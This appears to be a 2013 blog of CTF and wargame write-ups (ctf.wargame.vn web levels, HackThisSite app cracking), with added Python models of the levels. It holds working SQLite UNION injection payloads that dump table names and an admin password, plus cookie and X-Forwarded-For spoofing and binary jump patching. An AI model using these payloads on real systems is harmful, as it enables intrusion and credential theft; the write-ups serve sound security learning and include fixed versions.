Saturday, July 27, 2013

ctf.wargame.vn teaser round web100

This challenge is also quite simple, but it needs you to pay attention to what the server sends to, and receives from, your browser.
The hint the host gives us (translated from Vietnamese) is:
There are 7 levels :) + Levels 6-7 use SQLite

Level 7: You have to guess what the query is :). Try %29 %22
Other levels: look into PHP and Apache :).

In this challenge I use only a web browser (Firefox or Iceweasel) with some add-ons, plus Burp Suite to modify requests before they are sent.
Let's start with the link:
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/

It works!..

Basically, the website seems incomplete. Open the page source: nothing special there, except that there is a vertical scroll bar. Scroll down to the bottom and the level 2 link is hidden there. This trick always catches some players.

Let's continue to level 2 with the link we found in the previous level.

You're not logged in!

wtf, why aren't we logged in? There is no form for us to authenticate with, so there must be another way to make the server believe we are logged in. One way is a cookie: we need to send the server a cookie that tells it we are already logged in. Cookie Manager, a Firefox add-on, shows nothing; no cookie is stored yet. Next, let's check what the server sends to us with Live HTTP Headers, another Firefox add-on. (Thanks to ML for this hint; with my little CTF experience I did not even think I needed to examine what the server sends.)

Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT

That explains why there is no cookie stored in our browser: the server sets login=0 with an expiry date in the past, so the browser discards it immediately. The job is easy now: the server trusts a cookie the client controls, so set login=1 in our request to the server and we get the next level link.

In level 3 we do the same as in level 2, except that the login cookie must be set to the IP address hidden in this level's page source.

Level 4 is more of a challenge than the first three levels. Open the page source and we get a dump of the server variables array and a hidden variable.

I have to guess that, to pass this level, we need the server variable HTTP_1337 to be set to 1337.
To do this you need to understand what a server variable is and how PHP derives it from the request (http://www.php.net/manual/en/reserved.variables.server.php): every request header "Name: value" shows up as $_SERVER['HTTP_NAME'], with the name upper-cased and dashes turned into underscores. So insert the following line into the request's HTTP headers before it is sent to the server:
1337:1337

Level 5 is the same idea as level 4. We need our IP address ($_SERVER['REMOTE_ADDR']) to be 127.0.0.1, which seems impossible, because REMOTE_ADDR comes from the TCP connection rather than from anything we send. A quick Google search turns up http://en.wikipedia.org/wiki/X-Forwarded-For: that header is supplied by the client, so the level must be checking it as well, and adding X-Forwarded-For: 127.0.0.1 to the request gets us through.
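To make the levels 2-5 mechanics concrete, here is an added Python model (not the challenge's code) of how PHP under Apache builds $_SERVER and $_COOKIE from a raw request, together with the checks each level appears to make. The header-to-HTTP_* mapping and the origin of REMOTE_ADDR are PHP/Apache facts; the level checks, the hidden IP and the paths are assumptions reconstructed from the writeup. It also shows why the level 5 check is weak: X-Forwarded-For is just another client header, whereas REMOTE_ADDR cannot be chosen by the client.

```python
# Added illustration, not the challenge's code. Models PHP's $_SERVER
# population from a raw request and the (assumed) checks of levels 2-5.


def php_request_vars(raw_request: bytes, peer_ip: str) -> dict:
    """Return a dict modelling PHP's $_SERVER plus a '_COOKIE' entry.

    peer_ip is the TCP peer address Apache sees. It is the only value here
    that the client cannot choose; every header line is attacker-controlled.
    """
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    server = {"REQUEST_METHOD": method, "REQUEST_URI": target,
              "REMOTE_ADDR": peer_ip}
    cookies = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        name, value = name.strip(), value.strip()
        # PHP rule: upper-case, '-' -> '_', prefix HTTP_ ("1337: 1337" -> HTTP_1337)
        server["HTTP_" + name.upper().replace("-", "_")] = value
        if name.lower() == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                cookies[k] = v
    server["_COOKIE"] = cookies  # stand-in for PHP's separate $_COOKIE
    return server


def craft_request(path: str, headers: dict) -> bytes:
    """Build the raw GET request Burp would send: request line, headers, blank line."""
    lines = [f"GET {path} HTTP/1.1", "Host: challenges.wargame.vn:1337"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


# Assumed server-side checks, reconstructed from the writeup (not the real source).
def level2_passes(s: dict) -> bool:
    return s["_COOKIE"].get("login") == "1"


def level3_passes(s: dict, hidden_ip: str) -> bool:
    return s["_COOKIE"].get("login") == hidden_ip


def level4_passes(s: dict) -> bool:
    return s.get("HTTP_1337") == "1337"


def level5_passes_weak(s: dict) -> bool:
    # What the challenge evidently does: trust a client-supplied header.
    return s.get("HTTP_X_FORWARDED_FOR") == "127.0.0.1"


def level5_passes_strict(s: dict) -> bool:
    # What a correct "local only" check looks like: the socket peer address.
    return s["REMOTE_ADDR"] == "127.0.0.1"


if __name__ == "__main__":
    req = craft_request("/level5/", {"Cookie": "login=1", "1337": "1337",
                                     "X-Forwarded-For": "127.0.0.1"})
    s = php_request_vars(req, peer_ip="10.0.0.7")  # constructed peer address
    print({k: v for k, v in s.items() if k.startswith("HTTP_")})
    print("weak check:", level5_passes_weak(s), "strict check:", level5_passes_strict(s))
```

The same crafted request passes the weak X-Forwarded-For check and fails the strict REMOTE_ADDR check, which is exactly the difference between what the level verifies and what it was presumably meant to verify.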

Move on to the next level. This one is no longer a PHP trick; it requires SQL injection skill.
?id=1
Hello manhluat!

Try changing the value to see whether it is exploitable.
?id=1'
Nothing ...

So it may be injectable: the stray quote breaks the query and the application hides the error. Do some more SQLi:
id=-1 union select 1,1,1;--
Hello 1!

It works! Now it is time to exploit this level. We know it uses SQLite, so the following query pulls the table names out of sqlite_master:
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--

Hello users!

We get the table users. Now list its usernames and then the admin password:

?id=-1 union select 1,username,1 from users ;--
Hello admin!

?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!

Following the link, we reach level 7. Here the host's hint about %22 and %29, which are the URL encodings of the " and ) characters, tells us how the parameter is quoted in the query.


?id=-1
Hello!
?id=-1"
Nothing... -> there must be an error in the SQL query
?id=-1")
Nothing...
?id=-1");--
Hello!

OK, now we guess the query should be: select ... from ... where (id="xxx")

Let's do some more; the trailing ("1"="1 re-closes the parenthesis that the original query will terminate:
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!

OK. Now we know how to pass this level. Do the same as in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1

Hello flag!

?id=-1") union select 1,flag,1 from flag where ("1"="1

Done.
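As an added example (not the challenge's code), the following Python stand-in reproduces the level 6 and level 7 behaviour against an in-memory SQLite database, using the query shapes inferred above, and sets a parameterised version beside the vulnerable one. The schema, the data, the table named greetings and the level-7 link placeholder are constructed here; the real tables and values are not known. Note that the level 7 trick depends on SQLite's legacy behaviour of accepting double-quoted strings as literals, which is why "..." works where a standard database would treat it as an identifier.

```python
import sqlite3

# Added illustration, not the challenge's code. Schema and data are constructed.
LEVEL6_SCHEMA = """
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'manhluat', 'not-the-real-password'),
                         (2, 'admin',    'level7-link-goes-here');
"""
LEVEL7_SCHEMA = """
CREATE TABLE flag(id INTEGER, flag TEXT, note TEXT);
INSERT INTO flag VALUES (1, 'FLAG{constructed-example}', 'n/a');
CREATE TABLE greetings(id INTEGER, name TEXT, lang TEXT);   -- assumed base table
INSERT INTO greetings VALUES (1, 'manhluat', 'vi');
"""


def open_db(schema: str) -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(schema)
    return con


def run(con: sqlite3.Connection, sql: str, params=()) -> str:
    """Mimic the app: errors are swallowed (error_reporting(0) style) and
    reported as 'Nothing ...', otherwise 'Hello <second column>!' is printed,
    with an empty name when no row matched."""
    try:
        row = con.execute(sql, params).fetchone()
    except sqlite3.Error:
        return "Nothing ..."
    return f"Hello {row[1] if row else ''}!"


def level6(con: sqlite3.Connection, id_param: str) -> str:
    # Assumed query shape: the id is spliced in unquoted, three columns selected,
    # so "-1 union select 1,X,1" places X in the greeting.
    return run(con, f"SELECT id, username, password FROM users WHERE id={id_param}")


def level7(con: sqlite3.Connection, id_param: str) -> str:
    # Assumed from the probing: the id is wrapped as ( id = "..." ), so a payload
    # must supply ") to escape and ("1"="1 to rebalance the trailing ") of the query.
    return run(con, f'SELECT id, name, lang FROM greetings WHERE (id="{id_param}")')


def level6_fixed(con: sqlite3.Connection, id_param: str) -> str:
    # Bound parameter: the value is data only and can never alter the statement,
    # so every payload above simply matches no row.
    return run(con, "SELECT id, username, password FROM users WHERE id=?", (id_param,))


if __name__ == "__main__":
    c6, c7 = open_db(LEVEL6_SCHEMA), open_db(LEVEL7_SCHEMA)
    for p in ["1", "1'", "-1 union select 1,1,1;--",
              "-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--",
              "-1 union select 1,password,1 from users where username='admin';--"]:
        print("level6", repr(p), "->", level6(c6, p), "| fixed ->", level6_fixed(c6, p))
    for p in ['-1', '-1"', '-1");--',
              '-1") union select 1,name,1 from sqlite_master where ("1"="1',
              '-1") union select 1,flag,1 from flag where ("1"="1']:
        print("level7", repr(p), "->", level7(c7, p))
```

Because UNION (without ALL) sorts and de-duplicates its rows, fetching only the first row returns the alphabetically smallest value, which is why admin comes before manhluat in level 6 and flag comes before the other table in level 7; in a real engagement you would add LIMIT/OFFSET or group_concat() to walk the full result set.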

ctf.wargame.vn teaser round web50


There are 2 links in this challenge:
  • main: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/?x=

  • source code: this looks like a mistake by the web developer, who left an editor backup (the ~ suffix) of the web source code on the server: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/index.php~

So first, check the source code to see what this mission requires.
Opening that source-code link gives a blank page. No worries, view the page source (this is the most important step in all web challenges):

<?php
error_reporting(0);                 // hide errors such as a missing flag file
$flag = file('../../flag.txt');     // one array element per line of the file
if ($_GET['x']==="\x01\x03\x03\x07") // strict comparison against four raw bytes
 echo $flag[0];
?>
  
So main strictly compares (===) the x parameter with a string of four bytes, 0x01, 0x03, 0x03 and 0x07; hence we need to feed x exactly those bytes.
To do that we have to know how to pass raw bytes in a URL: percent-encoding, a % sign followed by two hex digits, which the server decodes before filling $_GET. For example, %20 stands for a space.
Back to the main link: feed ?x=%01%03%03%07 and we get the flag.

Wednesday, July 17, 2013

HTS App 16

First thought: this app should be marked as easy.
It uses the CreateProcess API to run a .bat file hidden in a secret place. Finding that bat file solves this application.

HTS app 12

This application is different from the others. It does not show the password or hide it somewhere else; it generates the password while running.
There are 2 timers: one for displaying the password verification and the other for checking the password.
With VB Decompiler Lite you can get the address of the Timer_Timer() function. Set a breakpoint there with OllyDbg.
Try to find the conditional jump that leads to the message "Possibly correct!".
When you get there (the conditional jump), search the stack for what you need. If you are not a native speaker, you may need a dictionary to recognise the real password (like me :P).

Joomla error Warning: Invalid argument supplied for foreach() in .../libraries/joomla/database/database/mysql.php on line 383

This error gave me a headache for a morning.
These warnings are displayed instead of the articles.
You may also have problems when you log in to the admin panel and cannot read some articles, categories, etc.
phpMyAdmin cannot show the table structure either, even after you repair the tables.
You also see this error when trying to save the configuration:

“The Global Configuration extension could not be found. Text filter settings have not been saved.”

 
The problem: the MySQL server's tmp directory is full.
Solution: clear tmp.
Done!

HTS app13

As the hint says, to complete this application you need to rely on the execution time (a timing side channel).
- Brute-force each number (1-999) one position at a time.
- Start with number 1, then number 2, then number 3.
- When you have the first 3 numbers, do the same for number 4; the password is shown once all 4 numbers match.
Note: when I brute-forced the 4th number I waited forever before realising that it needs me to hit Any Key to confirm, so take care with this one.

Tuesday, July 16, 2013

HTS app11

This app is ridiculous. After reading some hints, I got it when I maximized the app window.

HTS App10

The password of this application is very easy to get.
- Open app10win with VB Decompiler Lite.
- You will notice there are three functions but only one visible button, so there is a hidden one.
- With OllyDbg, change the jump target of the Command1 handler to that hidden function, and you will get the correct password.

Monday, July 15, 2013

hackthissite application 5+6

With OllyDbg:
- Search for the important strings.
- Trace the code and carefully examine what is stored on the stack.

hackthissite application 4

What I need is OllyDbg and VB Decompiler Lite.
- Open app4 with VB Decompiler Lite.
- Wait until it finishes decompiling.
- Look for the addresses of Command1_Click and Command1_MouseMove.
- Attach OllyDbg to app4 and run it.
- Find the address of the JUMP to the Command1_MouseMove function.
- Change it to a JUMP to the Command1_Click function.
- Done.

Saturday, July 13, 2013

realistic mission 15,16

What I've learnt today:
- Read source code carefully.
- Extract a password-protected zip without the password using pkcrack (a known-plaintext attack against the old ZIP cipher).
- $$var => ${$var} (PHP variable variables).
- Override PHP variables with POST and GET parameters (what register_globals or extract() on user input allows).